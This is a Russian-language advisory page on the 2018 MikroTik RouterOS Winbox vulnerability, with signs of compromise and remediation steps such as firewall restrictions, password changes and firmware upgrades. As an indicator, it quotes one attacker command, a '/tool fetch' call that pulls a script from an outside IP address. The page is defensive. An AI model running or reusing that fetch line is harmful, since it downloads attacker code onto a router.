Уязвимость Mikrotik на RouterOS

Обнаружена уязвимость у всех продуктов Mikrotik c системой  RouterOS (информация от Mon Apr 23, 2018 1:05 pm)

Как написано в релизе на сайте Микротик - Уязвимость позволила с помощью специальных инструментов подключиться к порту Winbox и запросить файл базы данных пользовательской системы. Что позволяет узнать логин и  пароль, беспрепятственно войти в систему.

 Как узнать? Я пострадал? В настоящее время нет верного пути, чтобы увидеть, были ли вы затронуты. Если ваш порт Winbox открыт для ненадежных сетей, предположите, что вы затронуты и обновите прошивку + сменить пароль + проверьте и откорректируйте правила брандмауэр. Убедитесь, что вы изменили пароль после обновления. В журнале может появиться неудачная попытка входа в систему, а затем удачная попытка входа в систему с неизвестных IP-адресов.

 Что делать: 1) Настроить Firewall - убрать ( закрыть) порт Winbox из открытого интерфейса и из ненадежных сетей. Лучше всего, если вы разрешаете известным IP-адресам подключаться к вашему маршрутизатору и к любым службам, а не только к Winbox. Мы предлагаем что это станет обычной практикой. В качестве альтернативы, возможно, проще использовать меню «IP -> Services», чтобы указать адреса «Разрешено с». Включите локальную сеть и общедоступный IP-адрес, с которого вы будете получать доступ. 2) Измените свои пароли. 3) Возможно изменить адрес номер порта для сервиса на нестандартный.

 Что ожидать в ближайшие часы / дни: обновленные версии RouterOS будут доступны. Безопасность базы данных пользователей RouterOS будет упрочнена, и расшифровка будет невозможна таким образом.

 Характерные приметы: 

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php 

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов (обычно на 8.8.8.8).

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.

 Решение.

Оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.

 Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

© Инелсис 2012. Все права сохранены.

Page Rank Check

Captcha
[ Другое изображение ]
Log in to your account or Регистрация